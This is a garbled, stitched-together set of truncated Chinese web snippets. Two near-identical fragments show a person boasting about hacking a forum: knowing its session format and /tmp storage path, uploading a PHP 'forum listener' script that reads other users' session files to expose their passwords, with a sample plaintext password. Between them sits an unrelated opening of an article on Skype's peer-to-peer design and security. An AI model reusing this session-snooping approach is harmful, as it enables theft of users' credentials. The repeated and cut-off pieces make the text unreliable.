如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：<?functionsubmit1(){global$username;print"<title>论坛监听器</title>";$i=0;if($username=="tasm"||$username=="Tasm"){print"你也太黑了吧？连我你也查？";return;}$path="/tmp/";$d=dir($path);while(...

现在，关于Skype对企业网络以及个人用户有危害方面的那些正确的、不正确的信息正广泛地流传着。它究竟有多不安全呢？我将在本文中告诉你关于Skype漏洞的真相。 了解Skype的基本结构 Skype是点对点（P2P）应用程序，也就是说，用户与用户之间是直接连接的，不通过任何中间通信服务器。当用户登录，Skype最初使用基于网络的服务器来验证用户并且追踪他们的状态，但是一旦用户发起了“聊天”或者发送即时消息，“语音对话”或者“文件传输”，通信双方就是通过p2p直接连接在一起来实现这些的。如果进行连接的用户中有不少于一个用户使用了典型的企业网络网址传输（NAT）防火墙，那么由于N...

之所以是能写出来这个函数，主要是对该网站的session结构清楚，如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道该session存放的位置，而且可以上传文件，所以嘛，当时就做了一次小小的黑客，在线的朋友的密码可以一览无余，呵呵：<?functionsubmit1(){global$username;print"<title>论坛监听器</title>";$i=0;if($username=="tasm"|...